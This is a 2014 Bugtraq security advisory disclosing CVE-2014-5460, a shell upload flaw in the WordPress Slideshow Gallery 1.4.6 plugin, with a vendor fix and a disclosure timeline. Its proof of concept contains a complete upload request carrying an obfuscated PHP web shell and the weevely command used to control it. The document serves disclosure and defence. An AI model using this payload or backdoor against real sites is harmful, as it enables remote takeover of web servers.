[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460)
- From: jesus.ramirez.pichardo@xxxxxxxxx
- Date: Sat, 30 Aug 2014 06:07:42 GMT
WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell
upload vulnerability.
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
Description:
I found a serious security vulnerability in the Slideshow Gallery plugin. This
bug allows an attacker to upload any php file remotely to the vulnerable
website (administrator by default).
I have tested and verified that having the current version of the plugin
installed in a WordPress installation will allow any registered user
(Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP
shell to exploit the host system.
Backdoor location:
http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
Today (2014-08-29), I did the notification to vendor and they gave me feedback
about the vulnerability by email. The vendor has released a patch a few hours
ago. (SlideShow Gallery version 1.4.7 at
https://wordpress.org/plugins/slideshow-gallery/changelog).
Slideshow Gallery 1.4.7
FIX: Possible shell exploit by uploading PHP file as slide
Proof of Concept (PoC):
1.An attacker uploads a PHP shell file (i.e. backdoor.php):
POST
http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save
HTTP/1.1
Content-Type: multipart/form-data
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce");
$dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz";
$asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiRrLic+Jzt9";
$gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSzh";
$fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpezhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
2.The backdoor is located at
http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3.The attacker uses a security tool (i.e. weevely) in order to communicate with
the backdoor.
#weevely
http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
whitexploit
4.Now the attacker has a ?telnet-like console?. Finally, the attacker has the
remote control of the vulnerable website.
Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@xxxxxxxxxxxxx)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure
Found by: Jesús Ramírez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/
Date: 2014-08-28